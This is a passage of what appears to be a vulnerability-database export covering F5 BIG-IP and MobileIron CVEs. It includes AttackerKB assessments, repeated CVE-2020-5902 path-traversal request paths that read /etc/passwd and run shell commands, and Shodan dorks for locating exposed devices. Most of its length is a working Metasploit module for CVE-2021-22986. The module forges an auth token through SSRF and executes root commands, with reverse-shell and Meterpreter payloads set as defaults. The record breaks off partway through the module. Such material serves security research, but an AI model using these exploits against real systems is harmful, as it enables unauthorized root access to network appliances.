\"tm:util:bash:runstate\",\n \"command\": \"run\",\n \"utilCmdArgs\": \"-c id\",\n \"commandResult\": \"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\\n\"\n }\n [root@localhost:NO LICENSE:Standalone] ~ #\n \n\nThis formed the basis for most of my SSRF attempts until I saw the parameter allowlist and noticed my `Authorization` header wasn\u2019t being passed through. :<\n\n## RCE update\n\n[Rich Warren](<https://twitter.com/buffaloverflow>) has produced a [full RCE chain](<https://twitter.com/buffaloverflow/status/1371988878672941057>) using the SSRF! **ETA: I tested 10% of the registered endpoints and discovered no fewer than 15 that were chainable to full RCE. This concludes my investigation of CVE-2021-22986. Thank you to F5 SIRT for being wonderful to work with, and many thanks to Rich for being a great collaborator!**\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-06T00:00:00", "id": "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E", "href": "https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-03T23:01:58", "description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n\n \n**Recent assessments:** \n \n**Mad-robot** at July 05, 2020 1:21pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\n**kevthehermit** at July 03, 2020 5:30pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\n**ccondon-r7** at July 04, 2020 10:41pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\n**busterb** at July 06, 2020 2:29am UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\n**0xturazzi** at July 10, 2020 1:59pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\n**gwillcox-r7** at October 20, 2020 5:49pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\n**wvu-r7** at September 03, 2020 5:15pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\n**miteshkwan1** at July 17, 2020 1:32pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-01T00:00:00", "type": "attackerkb", "title": "CVE-2020-5902 \u2014 TMUI RCE vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-12-21T00:00:00", "id": "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "href": "https://attackerkb.com/topics/evLpPlZf0i/cve-2020-5902-tmui-rce-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:11:10", "description": "An authentication bypass vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 that allows remote attackers to bypass authentication mechanisms via unspecified vectors.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 22, 2020 8:22pm UTC reported:\n \n \n https://mobileiron/mifs/.;/services/someService\n \n\nThe \u201c[auth bypass](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>)\u201d relies on a discrepancy between how Apache and Tomcat parse the path component in the URI, which is the same technique that was applied to [CVE-2020-5902](<https://attackerkb.com/topics/evLpPlZf0i/cve-2020-5902-tmui-rce-vulnerability>).\n\n\u201cBypassing authentication\u201d allows one to achieve RCE against either the user interface or the management interface, though it\u2019s not clear that [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) is the RCE used in the [blog post](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>). This is more of an ACL bypass than an auth bypass, honestly. This was briefly mentioned in the post.\n\nSince MobileIron is [mobile device management (MDM)](<https://en.wikipedia.org/wiki/Mobile_device_management>) software, which is increasingly relevant as the workforce shifts toward remote work, compromising a target\u2019s MDM infrastructure may have devastating consequences.\n\nDevelopers gluing disparate pieces of software together should take care to avoid turning expected input from one software into unexpected input for another. This bug class is [well-documented](<https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf>). In the end, even input sanitization should take care to avoid normalization bugs.\n\nGreat find, Orange!\n\nAlso see [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), a MobileIron RCE.\n\n**ETA: [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) uses an _ACL_ bypass, but in retrospect, I don\u2019t think it\u2019s this _auth_ bypass.** This analysis can be applied to [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), consequently.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "attackerkb", "title": "CVE-2020-15506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15505", "CVE-2020-15506", "CVE-2020-5902"], "modified": "2020-09-18T00:00:00", "id": "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "href": "https://attackerkb.com/topics/nPl8YRkKRb/cve-2020-15506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-01T14:39:17", "description": "", "cvss3": {}, "published": "2021-04-01T00:00:00", "type": "packetstorm", "title": "F5 iControl Server-Side Request Forgery / Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-01T00:00:00", "id": "PACKETSTORM:162059", "href": "https://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF in the F5 iControl REST API's \n/mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that \ncan be used to execute root commands on an affected BIG-IP or BIG-IQ \ndevice. This vulnerability is known as CVE-2021-22986. \n \nCVE-2021-22986 affects the following BIG-IP versions: \n \n* 12.1.0 - 12.1.5 \n* 13.1.0 - 13.1.3 \n* 14.1.0 - 14.1.3 \n* 15.1.0 - 15.1.2 \n* 16.0.0 - 16.0.1 \n \nAnd the following BIG-IQ versions: \n \n* 6.0.0 - 6.1.0 \n* 7.0.0 \n* 7.1.0 \n \nTested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion. \n}, \n'Author' => [ \n'wvu', # Analysis and exploit \n'Rich Warren' # First blood (RCE) and endpoint collaboration \n], \n'References' => [ \n['CVE', '2021-22986'], \n['URL', 'https://support.f5.com/csp/article/K03009991'], \n['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'], \n['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/'] \n# https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html \n], \n'DisclosureDate' => '2021-03-10', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session \n'SideEffects' => [ \nIOC_IN_LOGS, # /var/log/restjavad.0.log (rotated) \nACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('USERNAME', [true, 'Valid admin username', 'admin']), \nOptString.new('ENDPOINT', [false, 'Custom token generation endpoint']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef user_reference_endpoint \nnormalize_uri(target_uri.path, '/mgmt/shared/authz/users', username) \nend \n \ndef check \ngenerate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@token ||= generate_token_ssrf) \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef generate_token_ssrf \nprint_status('Generating token via SSRF...') \nvprint_status(\"Username: #{username}\") \nvprint_status(\"Endpoint: #{login_reference_endpoint}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'), \n'ctype' => 'application/json', \n'data' => { \n'username' => username, \n'bigipAuthCookie' => '', \n'authProviderName' => 'local', \n'loginReference' => { \n'link' => \"https://localhost#{login_reference_endpoint}\" \n}, \n'userReference' => { \n'link' => \"https://localhost#{user_reference_endpoint}\" \n} \n}.to_json \n) \n \nunless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token')) \nprint_error('Failed to generate token') \nreturn \nend \n \nprint_good(\"Successfully generated token: #{@token}\") \n@token \nend \n \ndef execute_command(cmd, _opts = {}) \nbash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\" \n \nprint_status(\"Executing command: #{bash_cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'), \n'ctype' => 'application/json', \n'headers' => { \n'X-F5-Auth-Token' => @token \n}, \n'data' => { \n'command' => 'run', \n'utilCmdArgs' => \"-c '#{bash_cmd}'\" \n}.to_json \n}, datastore['CmdExecTimeout']) \n \nunless res \nvprint_warning('Command execution timed out') \nreturn \nend \n \nunless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate' \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n \nprint_good('Successfully executed command') \n \nreturn unless (cmd_result = res.get_json_document['commandResult']) \n \nvprint_line(cmd_result) \nend \n \ndef login_reference_endpoint \nif datastore['ENDPOINT'] \nreturn normalize_uri(target_uri.path, datastore['ENDPOINT']) \nend \n \n@token_generation_endpoint ||= token_generation_endpoints.sample \n \nnormalize_uri(target_uri.path, @token_generation_endpoint) \nend \n \n# Usable token generation endpoints between versions 12.1.4 and 16.0.1 \ndef token_generation_endpoints \n%w[ \n/access/file-path-manager/indexing \n/cm/autodeploy/cluster-software-images/indexing \n/cm/autodeploy/qkview/indexing \n/cm/autodeploy/software-images/indexing \n/cm/autodeploy/software-volume-install/indexing \n/cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing \n/cm/system/authn/providers/tmos/indexing \n/mgmt/shared/analytics/avr-proxy-tasks \n/mgmt/shared/gossip \n/mgmt/shared/gossip-peer-refresher \n/mgmt/shared/identified-devices/config/device-refresh \n/mgmt/shared/save-config \n/mgmt/tm/shared/bigip-failover-state \n/shared/analytics/avr-proxy-tasks \n/shared/analytics/avr-proxy-tasks/indexing \n/shared/analytics/event-aggregation-tasks/indexing \n/shared/analytics/event-analysis-tasks/indexing \n/shared/authn/providers/local/groups/indexing \n/shared/authz/remote-resources/indexing \n/shared/authz/resource-groups/indexing \n/shared/authz/roles/indexing \n/shared/authz/tokens/indexing \n/shared/chassis-framework-upgrades/indexing \n/shared/device-discovery-tasks/indexing \n/shared/device-group-key-pairs/indexing \n/shared/echo/indexing \n/shared/framework-info-tasks/indexing \n/shared/framework-upgrades/indexing \n/shared/gossip \n/shared/gossip-peer-refresher \n/shared/group-task/indexing \n/shared/iapp/blocks/indexing \n/shared/iapp/build-package/indexing \n/shared/iapp/health-prefix-map/indexing \n/shared/iapp/package-management-tasks/indexing \n/shared/iapp/template-loader/indexing \n/shared/identified-devices/config/device-refresh \n/shared/nodejs/loader-path-config/indexing \n/shared/package-deployments/indexing \n/shared/resolver/device-groups/indexing \n/shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing \n/shared/root-framework-upgrades/indexing \n/shared/rpm-tasks/indexing \n/shared/save-config \n/shared/snapshot-task/indexing \n/shared/snapshot/indexing \n/shared/stats-information/indexing \n/shared/storage/tasks/indexing \n/shared/task-scheduler/scheduler/indexing \n/shared/tmsh-shell/indexing \n/tm/analytics/afm-sweeper/generate-report/indexing \n/tm/analytics/afm-sweeper/report-results/indexing \n/tm/analytics/application-security-anomalies/generate-report/indexing \n/tm/analytics/application-security-anomalies/report-results/indexing \n/tm/analytics/application-security-network/generate-report/indexing \n/tm/analytics/application-security-network/report-results/indexing \n/tm/analytics/application-security/generate-report/indexing \n/tm/analytics/application-security/report-results/indexing \n/tm/analytics/asm-bypass/generate-report/indexing \n/tm/analytics/asm-bypass/report-results/indexing \n/tm/analytics/asm-cpu/generate-report/indexing \n/tm/analytics/asm-cpu/report-results/indexing \n/tm/analytics/asm-memory/generate-report/indexing \n/tm/analytics/asm-memory/report-results/indexing \n/tm/analytics/cpu/generate-report/indexing \n/tm/analytics/cpu/report-results/indexing \n/tm/analytics/disk-info/generate-report/indexing \n/tm/analytics/disk-info/report-results/indexing \n/tm/analytics/dns/generate-report/indexing \n/tm/analytics/dns/report-results/indexing \n/tm/analytics/dos-l3/generate-report/indexing \n/tm/analytics/dos-l3/report-results/indexing \n/tm/analytics/http/generate-report/indexing \n/tm/analytics/http/report-results/indexing \n/tm/analytics/ip-intelligence/generate-report/indexing \n/tm/analytics/ip-intelligence/report-results/indexing \n/tm/analytics/ip-layer/generate-report/indexing \n/tm/analytics/ip-layer/report-results/indexing \n/tm/analytics/lsn-pool/generate-report/indexing \n/tm/analytics/lsn-pool/report-results/indexing \n/tm/analytics/memory/generate-report/indexing \n/tm/analytics/memory/report-results/indexing \n/tm/analytics/network/generate-report/indexing \n/tm/analytics/network/report-results/indexing \n/tm/analytics/pem/generate-report/indexing \n/tm/analytics/pem/report-results/indexing \n/tm/analytics/proc-cpu/generate-report/indexing \n/tm/analytics/proc-cpu/report-results/indexing \n/tm/analytics/protocol-security-http/generate-report/indexing \n/tm/analytics/protocol-security-http/report-results/indexing \n/tm/analytics/protocol-security/generate-report/indexing \n/tm/analytics/protocol-security/report-results/indexing \n/tm/analytics/sip/generate-report/indexing \n/tm/analytics/sip/report-results/indexing \n/tm/analytics/swg-blocked/generate-report/indexing \n/tm/analytics/swg-blocked/report-results/indexing \n/tm/analytics/swg/generate-report/indexing \n/tm/analytics/swg/report-results/indexing \n/tm/analytics/tcp-analytics/generate-report/indexing 